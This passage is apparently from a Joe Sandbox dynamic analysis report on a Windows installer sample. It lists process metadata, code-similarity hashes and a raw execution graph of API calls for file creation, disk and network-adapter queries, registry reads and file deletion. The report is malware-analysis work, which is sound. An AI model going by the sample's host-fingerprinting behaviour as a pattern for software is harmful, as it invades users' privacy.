                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:08:46:12
                                                              Start date:14/03/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2244326748.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_setup#U67e5#U8be2_pf2024.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d15299dc2022adb2b2db0ad74ad79715b3db66659a3374db52785553096d272f
                                                                • Instruction ID: 971a33f4b3793d3a992831974d9f883ed70187b4b9574942d35ba496b37a2f96
                                                                • Opcode Fuzzy Hash: d15299dc2022adb2b2db0ad74ad79715b3db66659a3374db52785553096d272f
                                                                • Instruction Fuzzy Hash: E7A0228320E020208020302B3C88CCB8F2CCCC223A000003BF00000002002C0082C0B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2244326748.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_setup#U67e5#U8be2_pf2024.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d670a538bd4a908bd9d172d7d017f1d9a30ef3588fd3455cb1bb55c2a5594717
                                                                • Instruction ID: c503460450c058d637f37f3c5957b8e14723032a2e490da69ad7854ae5bc5bd0
                                                                • Opcode Fuzzy Hash: d670a538bd4a908bd9d172d7d017f1d9a30ef3588fd3455cb1bb55c2a5594717
                                                                • Instruction Fuzzy Hash: CBA0029B71A1A0249460312F7C89CCB4F5CD9C26791119ABBF305540870539448A80B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2244326748.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_setup#U67e5#U8be2_pf2024.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd3b6e05cd61c41966590581ae0b27f4462787ac1419206677b8e0a8cfe5506b
                                                                • Instruction ID: 710516d69d16f6eecdadf0f8a0f108e889be14df6fe213f5d60dffe8aa32416a
                                                                • Opcode Fuzzy Hash: fd3b6e05cd61c41966590581ae0b27f4462787ac1419206677b8e0a8cfe5506b
                                                                • Instruction Fuzzy Hash: 49A0025724A760649460312B7C89CCB4F1CEDC667911115BFF109541460529448688B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:6.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:9.1%
                                                                Total number of Nodes:1955
                                                                Total number of Limit Nodes:141
6bd853de 67681->67699 67686 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67682->67686 67682->67699 67683 6bd85434 strncpy_s 67690 6bd852fa 67683->67690 67684 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67685 6bd85470 67684->67685 67685->67606 67687 6bd852c4 CreateDirectoryA 67686->67687 67688 6bd852ea GetLastError 67687->67688 67691 6bd85305 67687->67691 67689 6bd852f3 GetLastError 67688->67689 67688->67691 67689->67690 67689->67691 67690->67684 67692 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67691->67692 67693 6bd8533f CreateDirectoryA 67692->67693 67694 6bd85360 GetLastError 67693->67694 67696 6bd85370 67693->67696 67695 6bd85369 GetLastError 67694->67695 67694->67696 67695->67690 67695->67696 67697 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67696->67697 67698 6bd853aa CreateFileA 67697->67698 67698->67699 67700 6bd853e6 GetLastError 67698->67700 67699->67683 67699->67690 67700->67690 67701 6bd853ed CreateFileA 67700->67701 67701->67683 67701->67690 67703 6bd867bc GetFileSize 67702->67703 67704 6bd867b5 SetEndOfFile 67702->67704 67705 6bd867dd CreateFileA 67703->67705 67706 6bd867d5 67703->67706 67704->67703 67707 6bd86805 67705->67707 67706->67705 67706->67707 67708 6bd86831 memset 67707->67708 67709 6bd86825 CloseHandle 67707->67709 67711 6bd8684b 67708->67711 67713 6bd86878 67708->67713 67710 6bd86bf1 67709->67710 67710->67617 67712 6bd86853 __snprintf_s 67711->67712 67712->67712 67712->67713 67714 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67713->67714 67715 6bd86a82 67714->67715 67716 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67715->67716 67717 6bd86a91 67716->67717 67718 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67717->67718 67719 6bd86aa0 67718->67719 67720 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67719->67720 67721 6bd86aaf 67720->67721 67722 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67721->67722 67723 6bd86abb 67722->67723 67724 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67723->67724 67725 6bd86aca 67724->67725 67726 6bd0a3a0 
_invalid_parameter_noinfo_noreturn 67725->67726 67727 6bd86ad9 67726->67727 67728 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67727->67728 67729 6bd86ae8 67728->67729 67730 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67729->67730 67731 6bd86af7 67730->67731 67732 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67731->67732 67733 6bd86b06 67732->67733 67734 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67733->67734 67735 6bd86b12 67734->67735 67736 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67735->67736 67737 6bd86b1e 67736->67737 67738 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67737->67738 67739 6bd86b2d 67738->67739 67740 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67739->67740 67741 6bd86b3c 67740->67741 67742 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67741->67742 67743 6bd86b4b 67742->67743 67744 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67743->67744 67745 6bd86b5a 67744->67745 67746 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67745->67746 67747 6bd86b69 67746->67747 67748 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67747->67748 67749 6bd86b78 67748->67749 67750 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67749->67750 67751 6bd86b87 67750->67751 67752 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67751->67752 67753 6bd86b96 67752->67753 67754 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67753->67754 67755 6bd86ba6 WriteFile 67754->67755 67756 6bd86bde 67755->67756 67757 6bd86bd2 67755->67757 67759 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67756->67759 67757->67756 67758 6bd86bd7 CloseHandle 67757->67758 67758->67756 67759->67710 67760->67628 67762 6be24070 67761->67762 67763 6bd84e63 memset GetSystemDirectoryA PathAppendA LoadLibraryA 67762->67763 67764 6bd84eca GetProcAddress 67763->67764 67767 6bd84ec3 67763->67767 67765 6bd84ede GetAdaptersInfo 67764->67765 67766 6bd84fa6 FreeLibrary memset 67764->67766 67765->67766 67770 6bd84f00 67765->67770 67766->67767 67767->67672 67769 6bd84f12 memset 67769->67770 67771 6bd84fa0 67770->67771 67772 6bd84c53 RegOpenKeyExA 
67770->67772 67771->67766 67773 6bd84cbd __snprintf_s RegOpenKeyExA 67772->67773 67774 6bd84e17 67772->67774 67775 6bd84e0f RegCloseKey 67773->67775 67776 6bd84d04 RegQueryValueExA 67773->67776 67774->67769 67775->67774 67777 6bd84d45 memset RegQueryValueExA 67776->67777 67778 6bd84e07 RegCloseKey 67776->67778 67777->67778 67779 6bd84d96 67777->67779 67778->67775 67780 6bd84da1 strlen strncmp 67779->67780 67783 6bd84dc4 67779->67783 67781 6bd84dc8 67780->67781 67780->67783 67782 6bd84dd3 strlen strncmp 67781->67782 67781->67783 67782->67783 67783->67778 67790 6bd8453d 67784->67790 67785 6bd84779 67785->67677 67786 6bd84545 memset __snprintf_s CreateFileA 67787 6bd8459a memset DeviceIoControl 67786->67787 67786->67790 67788 6bd845e1 memset memset DeviceIoControl 67787->67788 67787->67790 67789 6bd8475c FindCloseChangeNotification 67788->67789 67788->67790 67789->67790 67790->67785 67790->67786 67790->67789 67791 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67790->67791 67791->67790 67798 6bd8411f 67792->67798 67793 6bd842fc 67793->67679 67794 6bd84127 memset __snprintf_s CreateFileA 67794->67798 67795 6bd84184 memset memmove DeviceIoControl 67795->67798 67796 6bd842d9 FindCloseChangeNotification 67796->67798 67797 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67797->67798 67798->67793 67798->67794 67798->67795 67798->67796 67798->67797 67800 6bd847ad 67799->67800 67801 6bd84a91 67800->67801 67802 6bd847b5 memset __snprintf_s CreateFileA 67800->67802 67801->67675 67802->67800 67803 6bd84806 memset memset DeviceIoControl 67802->67803 67804 6bd84a7a GetLastError 67803->67804 67805 6bd84872 memset memset memset 67803->67805 67806 6bd84a80 CloseHandle 67804->67806 67810 6bd848c6 67805->67810 67806->67800 67807 6bd848ff isalnum 67808 6bd84914 isalnum 67807->67808 67807->67810 67808->67806 67808->67810 67809 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67809->67810 67810->67807 67810->67809 67812 6bd84a39 67810->67812 67811 6bd0a3a0 _invalid_parameter_noinfo_noreturn 
67811->67812 67812->67806 67812->67811 67814 6bd0f222 67813->67814 67815 6bd0f20e 67813->67815 67816 6bd0f233 memset 67814->67816 67817 6bd0f259 67814->67817 67815->67575 67816->67575 67821 6bd0fd30 67817->67821 67820 6bd0f26a 67820->67575 67822 6bd0fd55 67821->67822 67825 6bd0fe7a 67821->67825 67823 6bd0fd91 67822->67823 67824 6bd0fdbb 67822->67824 67844 6be22dcc 67823->67844 67827 6bd0fda2 67824->67827 67828 6be22dcc std::_Facet_Register 4 API calls 67824->67828 67831 6bd0fee1 67825->67831 67832 6bd0ff0b 67825->67832 67829 6bd0fe51 memmove memset 67827->67829 67830 6bd0fdf6 memmove memset 67827->67830 67833 6bd0fe4b _invalid_parameter_noinfo_noreturn 67827->67833 67828->67827 67829->67820 67834 6bd0fe22 67830->67834 67835 6bd0fe32 67830->67835 67836 6be22dcc std::_Facet_Register 4 API calls 67831->67836 67837 6bd0fef2 67832->67837 67838 6be22dcc std::_Facet_Register 4 API calls 67832->67838 67833->67829 67834->67833 67834->67835 67835->67820 67836->67837 67839 6bd0ff94 _invalid_parameter_noinfo_noreturn 67837->67839 67840 6bd0ff9a memmove memmove 67837->67840 67841 6bd0ff3f memmove memmove 67837->67841 67838->67837 67839->67840 67840->67820 67842 6bd0ff6b 67841->67842 67843 6bd0ff7b 67841->67843 67842->67839 67842->67843 67843->67820 67845 6be22dde malloc 67844->67845 67846 6be22dd1 _callnewh 67845->67846 67847 6be22deb 67845->67847 67846->67845 67849 6be22ded 67846->67849 67847->67827 67848 6be24833 67850 6be24841 _CxxThrowException 67848->67850 67849->67848 67851 6be24824 _CxxThrowException 67849->67851 67851->67848 67852 6be26060 67853 6be26098 67852->67853 67854 6be260b0 67853->67854 67855 6be260a8 TlsSetValue 67853->67855 67859 6bd9b98a __EH_prolog3_GS ?get_log_instance@base@@YAPAVILogger@1 67854->67859 67874 6bd9b397 67854->67874 67855->67854 67856 6be260be 67860 6bd9b9f1 GetTickCount 67859->67860 67868 6bd9b9a6 67859->67868 67861 6bd9bb5e 67860->67861 67862 6bd9ba12 67860->67862 67900 6bd9aaa0 __EH_prolog3_GS ?get_log_instance@base@@YAPAVILogger@1 
67861->67900 67863 6bd9ba18 GetTickCount 67862->67863 67881 6bd9b3cc 67863->67881 67865 6bd9bb6b 67865->67856 67867 6bd9b397 36 API calls 67869 6bd9ba2b 67867->67869 67868->67860 67869->67867 67870 6bd9ba3d ?get_log_instance@base@@YAPAVILogger@1 67869->67870 67871 6bd9bb43 Sleep 67869->67871 67873 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67869->67873 67894 6bd2a76f __EH_prolog3_GS 67869->67894 67870->67869 67871->67861 67871->67863 67873->67869 67875 6bd9b3c0 Sleep 67874->67875 67876 6bd9b3a3 67874->67876 67875->67856 67993 6bd9b8ba 67876->67993 67878 6bd9b3aa 67879 6bd9ab89 33 API calls 67878->67879 67880 6bd9b3b5 67878->67880 67879->67880 67880->67856 67882 6be24070 67881->67882 67883 6bd9b3e7 memset std::_Cnd_initX 67882->67883 67884 6bd9b47a std::_Cnd_initX 67883->67884 67885 6bd9b43f memmove 67883->67885 67886 6bd9b492 std::_Cnd_initX 67884->67886 67888 6bd9b48e 67884->67888 67887 6bd9b473 67885->67887 67889 6bd9b4f3 std::_Cnd_initX 67886->67889 67890 6bd9b4b2 memmove 67886->67890 67887->67884 67904 6bd9abc3 __EH_prolog3_GS 67888->67904 67889->67888 67892 6bd9b51d 67889->67892 67891 6bd9b4e6 67890->67891 67891->67889 67892->67869 67896 6bd2a7d7 67894->67896 67895 6bd2a834 67895->67869 67896->67895 67962 6bd2ea2f __EH_prolog3_GS 67896->67962 67898 6bd2a828 67899 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67898->67899 67899->67895 67903 6bd9aab9 67900->67903 67902 6bd9ab0b 67902->67865 67985 6bd9a880 __EH_prolog3_GS 67903->67985 67905 6bd9abec 67904->67905 67906 6bd9ac16 Concurrency::details::platform::__RegisterWaitForSingleObject 67905->67906 67908 6bd9ac2c 67905->67908 67907 6bd9afc7 67906->67907 67907->67892 67909 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67908->67909 67910 6bd9acaa 67909->67910 67911 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67910->67911 67912 6bd9acd8 ?ConvertQosToJsonString@qos@adapt_for_imports@ierd_tgp@@YAXABUtagQOSRep@@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_N 67911->67912 67913 6bd9ad3e 67912->67913 
67914 6bd9ae9b ?get_log_instance@base@@YAPAVILogger@1 67913->67914 67915 6bd9add5 ?get_log_instance@base@@YAPAVILogger@1 67913->67915 67917 6bd9af47 67914->67917 67921 6bd9aeaa 67914->67921 67922 6bd9ade4 67915->67922 67932 6bd9ae72 67915->67932 67919 6bd9af9c 67917->67919 67923 6bd9af87 Concurrency::details::platform::__RegisterWaitForSingleObject 67917->67923 67918 6bd9ae96 67920 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67918->67920 67938 6bd9afd1 67919->67938 67925 6bd9afbb 67920->67925 67921->67917 67927 6bd2a76f 27 API calls 67921->67927 67928 6bd2a76f 27 API calls 67922->67928 67922->67932 67923->67918 67926 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67925->67926 67926->67907 67931 6bd9aef0 67927->67931 67929 6bd9ae28 67928->67929 67930 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67929->67930 67930->67932 67933 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67931->67933 67934 6bd9ab89 67932->67934 67933->67917 67936 6bd9ab9d 67934->67936 67935 6bd9aaa0 33 API calls 67937 6bd9abc0 67935->67937 67936->67935 67936->67937 67937->67918 67939 6be24070 67938->67939 67940 6bd9afec std::_Cnd_initX memmove 67939->67940 67941 6bd99f50 67940->67941 67942 6bd9b052 std::_Cnd_initX ?get_log_instance@base@@YAPAVILogger@1 67941->67942 67945 6bd9b06c 67942->67945 67949 6bd9b0ea 67942->67949 67944 6bd9b10c 67944->67918 67946 6bd2a76f 27 API calls 67945->67946 67945->67949 67947 6bd9b0af 67946->67947 67948 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67947->67948 67948->67949 67950 6bd9a6ca __EH_prolog3 67949->67950 67951 6bd9a6e5 std::_Cnd_initX 67950->67951 67956 6bd9a783 67950->67956 67952 6bd9a6fb std::_Cnd_initX 67951->67952 67953 6bd9a70a 67951->67953 67952->67956 67954 6be22dcc std::_Facet_Register 4 API calls 67953->67954 67955 6bd9a718 67954->67955 67958 6bd9a739 67955->67958 67960 6bd99e5d __EH_prolog3 67955->67960 67956->67944 67959 6bd9a774 std::_Cnd_initX 67958->67959 67959->67956 67961 6bd99e86 67960->67961 67961->67958 67963 6bd2ea4f 67962->67963 67964 6bd2ea71 
?widen@?$ctype@D@std@@QBEDD 67963->67964 67965 6bd2eaab 67964->67965 67979 6bd2e69d __EH_prolog3_GS 67965->67979 67968 6bd2ecd6 ?widen@?$ctype@D@std@@QBEDD 67978 6bd2ed22 67968->67978 67969 6bd2eab6 67969->67968 67970 6bd2ed75 67969->67970 67971 6bd2ed90 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67970->67971 67972 6bd2eda2 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67971->67972 67973 6bd2ede9 67971->67973 67972->67973 67974 6bd2edb5 67972->67974 67973->67898 67975 6bd2edd0 ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 67974->67975 67976 6bd2edc3 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67974->67976 67975->67973 67977 6bd2eddf ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67975->67977 67976->67973 67976->67975 67977->67973 67978->67898 67980 6bd2e6ba 67979->67980 67981 6bd2e6c5 ?widen@?$ctype@D@std@@QBEDD 67980->67981 67982 6bd2e6e5 67981->67982 67983 6bd0f200 15 API calls 67982->67983 67984 6bd2e791 67983->67984 67984->67969 67986 6bd9aa9a 67985->67986 67989 6bd9a8a7 67985->67989 67986->67902 67987 6bd9a984 ?get_log_instance@base@@YAPAVILogger@1 67987->67989 67988 6bd9a92d ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123 67988->67989 67989->67986 67989->67987 67989->67988 67990 6bd9a967 ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@ 67989->67990 67991 6bd2a76f 27 API calls 67989->67991 67992 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67989->67992 67990->67989 67991->67989 67992->67989 67994 6bd9b8db 67993->67994 67995 6bd9b94e 67993->67995 67996 6bd9b952 select 67994->67996 67997 6bd9b946 Sleep 67994->67997 67995->67878 67996->67995 67997->67995 67998 6bd31650 __EH_prolog3 67999 6bd31677 67998->67999 68002 6bd31e4a __EH_prolog3_GS 67999->68002 68001 6bd31689 68003 6bd31e62 68002->68003 68004 6bd31e7d 68003->68004 68009 6bd30f05 __EH_prolog3_GS 68003->68009 68018 6bd31b55 __EH_prolog3_GS 68004->68018 68007 6bd31e91 GetTickCount 68008 6bd31eac 68007->68008 
68008->68001 68010 6bd31b55 __EH_prolog3_GS 68009->68010 68011 6bd30f31 68010->68011 68012 6bd30f74 memset GetCurrentProcessId 68011->68012 68013 6bd30fce 68012->68013 68014 6bd30fe4 CreateThread ?get_log_instance@base@@YAPAVILogger@1 68013->68014 68015 6bd31064 68014->68015 68016 6bd3101c 68014->68016 68020 6bd3109d __EH_prolog3_GS 68014->68020 68015->68004 68016->68015 68017 6bd1e945 17 API calls 68016->68017 68017->68015 68019 6bd31b69 68018->68019 68019->68007 68021 6bd310b0 68020->68021 68028 6bd310b8 68020->68028 68022 6bd310fd WaitForSingleObject 68022->68021 68022->68028 68023 6bd3111b ResetEvent 68023->68028 68024 6bd3117d ResetEvent 68024->68028 68025 6bd3114f GetTickCount 68026 6bd3115d 68025->68026 68025->68028 68026->68028 68027 6bd3122a ?_Xbad_function_call@std@ 68028->68021 68028->68022 68028->68023 68028->68024 68028->68025 68028->68027 68029 6bd31b55 __EH_prolog3_GS 68028->68029 68032 6bd83f74 __EH_prolog3_GS ?get_qm_report_guid@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123 ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ 68028->68032 68035 6bd32955 68028->68035 68029->68028 68033 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68032->68033 68034 6bd83faa 68033->68034 68034->68028 68038 6bd32a23 68035->68038 68041 6bd329bb __EH_prolog3_GS 68038->68041 68040 6bd3296e 68040->68028 68042 6bd329f8 68041->68042 68045 6bdd35ae __EH_prolog3_catch_GS _Xtime_get_ticks 68042->68045 68043 6bd32a0e 68043->68040 68046 6bdd2789 68045->68046 68047 6bdd3602 ?get_log_instance@base@@YAPAVILogger@1 68046->68047 68049 6bdd362a 68047->68049 68048 6bdd3c05 __Init_thread_footer 68050 6bdd3693 68048->68050 68049->68048 68049->68050 68066 6bdd2eca __EH_prolog3_GS 68050->68066 68052 6bdd3725 ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 68063 6bdd36e3 
68052->68063 68053 6bdd3b07 ?get_log_instance@base@@YAPAVILogger@1 68054 6bdd3a16 68053->68054 68054->68053 68055 6bdd3b69 DeleteFileW 68054->68055 68056 6bdd3bbb 68054->68056 68057 6bdd3b21 68054->68057 68055->68057 68056->68043 68057->68054 68057->68055 68057->68056 68058 6bdd383c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 68059 6bdd390a DeleteFileW 68058->68059 68058->68063 68061 6bdd391d ?get_log_instance@base@@YAPAVILogger@1 68059->68061 68062 6bdd3995 ?get_log_instance@base@@YAPAVILogger@1 68059->68062 68065 6bdd3924 68061->68065 68062->68065 68063->68052 68063->68054 68063->68058 68074 6bdd435f 68063->68074 68064 6bdd3959 GetLastError 68064->68065 68065->68063 68065->68064 68067 6be22dcc std::_Facet_Register 4 API calls 68066->68067 68068 6bdd2ef1 68067->68068 68078 6bdd2be3 __EH_prolog3_catch 68068->68078 68070 6bdd2f10 ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 68071 6bdd2f28 68070->68071 68072 6bdd2f3a _Open_dir 68071->68072 68073 6bdd2f64 68072->68073 68073->68063 68075 6bdd437c _Read_dir 68074->68075 68076 6bdd43ac 68074->68076 68075->68076 68077 6bdd439c _Close_dir 68075->68077 68076->68063 68077->68076 68079 6be22dcc std::_Facet_Register 4 API calls 68078->68079 68080 6bdd2bfc 68079->68080 68080->68070 68081 6bdbbdd8 RegOpenKeyExA 68082 6bdbbe13 memset RegQueryValueExA RegCloseKey 68081->68082 68083 6bdbbe71 68081->68083 68082->68083 68083->68083 68084 6be24367 68086 6be24373 68084->68086 68085 6be2437c 68086->68085 68087 6be243f1 ___scrt_fastfail 68086->68087 68088 6be2439b 68086->68088 68090 6be243f9 68087->68090 68089 6be243a5 __RTC_Initialize 68088->68089 68091 6be243e2 68089->68091 68092 6be2442e dllmain_raw 68090->68092 68094 6be24429 68090->68094 68102 6be24414 68090->68102 68093 6be243bd ___scrt_uninitialize_crt 68091->68093 68095 6be24448 dllmain_crt_dispatch 68092->68095 68092->68102 68093->68085 68096 6be2445f _DllMain 68094->68096 68095->68096 68095->68102 68097 6be24473 68096->68097 
68098 6be24495 68096->68098 68097->68098 68099 6be24477 _DllMain dllmain_crt_dispatch dllmain_raw 68097->68099 68100 6be2449e dllmain_crt_dispatch 68098->68100 68098->68102 68099->68098 68101 6be244b1 dllmain_raw 68100->68101 68100->68102 68101->68102 68103 6bf703f0 ioctlsocket 68104 6bd572d2 GetCurrentThreadId 68105 6bd57a7a __EH_prolog3_catch_GS 68104->68105 68106 6bd19a0e 68105->68106 68107 6bd57ab0 ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@ 68106->68107 68108 6bd1cef4 68107->68108 68109 6bd57af2 ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@ 68108->68109 68110 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68109->68110 68111 6bd57b36 68110->68111 68121 6bd474ad __EH_prolog3_GS 68111->68121 68113 6bd57ba5 68114 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68113->68114 68120 6bd57bc1 68114->68120 68115 6bd58325 68116 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68115->68116 68117 6bd58331 68116->68117 68118 6bd474ad 5 API calls 68118->68120 68119 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68119->68120 68120->68115 68120->68118 68120->68119 68122 6bd474c7 68121->68122 68123 6bd474dc 68122->68123 68126 6bd474f2 68122->68126 68124 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68123->68124 68125 6bd474e8 68124->68125 68125->68113 68129 6bd442d7 __EH_prolog3 68126->68129 68130 6bd442ee 68129->68130 68133 6bd44233 __EH_prolog3 68130->68133 68134 6bd4424b 68133->68134 68135 6bd44259 _CxxThrowException 68134->68135 68136 6bd23e55 68139 6bd23d1c ?CreateWndImpl@WndMsgReceiver@Tenio@@IAEPAUHWND__@@PBDP6GJPAU3@IIJ@Z 68136->68139 68137 6bd23e63 68139->68137 68140 6bd47553 __EH_prolog3_catch_GS 68141 6bd19a0e 68140->68141 68142 
6bd4757e ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 68141->68142 68143 6bd0a8f0 68142->68143 68144 6bd475b7 ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@ 68143->68144 68145 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68144->68145 68146 6bd475e3 68145->68146 68147 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68146->68147 68162 6bd475fa 68146->68162 68148 6bd47651 68147->68148 68149 6bd47696 ?u8_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@ 68148->68149 68152 6bd47728 68148->68152 68150 6bd476a9 68149->68150 68151 6bd476ca ?cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0 68149->68151 68153 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68150->68153 68157 6bd476fb 68151->68157 68154 6bd47765 ?u8_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@ 68152->68154 68153->68162 68155 6bd477a3 ?get_log_instance@base@@YAPAVILogger@1 68154->68155 68156 6bd4784f ?get_sh_folder@Sys_wrapper@common@ierd_tgp@@SA?AVpath@filesystem@3@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ 68154->68156 68159 6bd477aa 68155->68159 68165 6bd4787d 68156->68165 68160 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68157->68160 68158 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68161 6bd4781c 68158->68161 68159->68158 68160->68162 68163 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68161->68163 68164 6bd4782b 68163->68164 68167 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68164->68167 68166 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68165->68166 68169 6bd478d2 68166->68169 68168 6bd47847 68167->68168 68168->68156 68170 6bd0a3a0 
_invalid_parameter_noinfo_noreturn 68169->68170 68170->68157 68171 6bdbda53 __EH_prolog3_GS memset GetVersionExW 68172 6bdbdabc 68171->68172 68173 6bdbdaec 68172->68173 68176 6bdbdb95 68172->68176 68183 6bdbdad1 68172->68183 68174 6bdbdb06 _wcsnicmp 68173->68174 68173->68183 68177 6bdbdb2f _wcsnicmp 68174->68177 68174->68183 68175 6bdbdc6f ?Is64Bit_OS@Sys_wrapper@common@ierd_tgp@ 68178 6bdbdc8b 68175->68178 68180 6bd2a76f 27 API calls 68176->68180 68176->68183 68179 6bdbdb52 _wcsnicmp 68177->68179 68177->68183 68179->68183 68181 6bdbdc1a 68180->68181 68182 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68181->68182 68182->68183 68183->68175 68184 6bda8c50 OpenFileMappingW 68185 6bda8c68 MapViewOfFile 68184->68185 68186 6bda8c66 68184->68186 68187 46f3c8 68188 46f3d4 ___scrt_is_nonwritable_in_current_image 68187->68188 68209 46e5ca 68188->68209 68190 46f3db 68191 46f534 68190->68191 68194 46f405 68190->68194 68486 46f8ab 6 API calls ___scrt_fastfail 68191->68486 68193 